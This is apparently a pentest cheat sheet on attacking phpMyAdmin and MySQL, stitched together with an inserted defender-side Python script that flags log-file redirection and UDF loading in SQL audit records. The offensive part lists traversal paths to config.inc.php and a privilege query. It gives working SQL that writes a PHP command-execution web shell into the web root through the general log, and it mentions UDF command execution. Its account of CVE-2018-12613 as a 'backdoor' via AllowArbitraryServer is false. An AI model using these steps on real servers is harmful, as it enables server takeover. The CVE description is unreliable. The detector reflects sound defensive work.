../../etc/phpmyadmin/config.inc.php
../../var/lib/phpmyadmin/config.inc.php
.../config.inc.php

Look for:
SELECT grantee, privilege_type FROM information_schema.user_privileges;

If you have SUPER, you can change server variables, kill queries, and potentially compromise the entire DB server.

CVE-2018-12613 (Authenticated RCE)

In phpMyAdmin 4.8.0–4.8.1, a backdoor allows remote code execution via the $cfg['AllowArbitraryServer'] setting.
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';

For MySQL versions < 5.1, or with a writable plugin directory, compile a shared library and create a custom function to run commands.
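
A defender-side check for the two techniques above (log-file redirection and loading a shared library as a custom function), added here as an example and not part of the original page. It scans recorded SQL statements, assumed to come from an audit plugin or SQL proxy, and flags the suspicious ones; the web-root and extension lists, the account names, and the `sys_run` / `libexample.so` names in the sample are assumptions constructed for illustration.

```python
import re

# Assumption: web roots and script extensions worth alerting on; tune per host.
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/")
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar", ".jsp", ".aspx")

# SET GLOBAL / SET @@GLOBAL. on either log-file variable, capturing the new path.
LOG_FILE_RE = re.compile(
    r"set\s+(?:global\s+|@@global\.)(general_log_file|slow_query_log_file)"
    r"\s*=\s*(['\"])(.*?)\2", re.I)
# CREATE FUNCTION ... SONAME '...' loads a shared library as a UDF.
UDF_RE = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+"
    r"(['\"])(.*?)\2", re.I)


def classify(statement):
    """Return a list of (rule, detail) findings for one SQL statement."""
    findings = []
    m = LOG_FILE_RE.search(statement)
    if m:
        var, path = m.group(1).lower(), m.group(3)
        lowered = path.lower()
        # A log file that is a script, or that lives in a web root, is never normal.
        if lowered.endswith(SCRIPT_EXTS) or lowered.startswith(WEB_ROOTS):
            findings.append(("log-file-redirect", f"{var} -> {path}"))
    m = UDF_RE.search(statement)
    if m:
        # UDF registration is rare enough to review every occurrence.
        findings.append(("udf-load", f"{m.group(1)} from {m.group(3)}"))
    return findings


# Constructed sample: (account, statement) pairs as an audit source might record them.
SAMPLE = [
    ("app@10.0.0.5", "SELECT id, name FROM customers WHERE id = 42"),
    ("dba@localhost", "SET GLOBAL general_log_file = '/var/log/mysql/general.log'"),
    ("pma@10.0.0.9", "set global general_log_file='/var/www/html/shell.php'"),
    ("pma@10.0.0.9", "SET @@GLOBAL.slow_query_log_file = \"/tmp/q.PHP\""),
    ("pma@10.0.0.9", "CREATE FUNCTION sys_run RETURNS INTEGER SONAME 'libexample.so'"),
]


def scan(records):
    """Return (account, rule, detail) for every suspicious statement."""
    return [(acct, rule, detail)
            for acct, stmt in records
            for rule, detail in classify(stmt)]


if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="  ")
```
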
For pentesters: always check for phpMyAdmin early. For defenders: assume it will be discovered, and harden accordingly.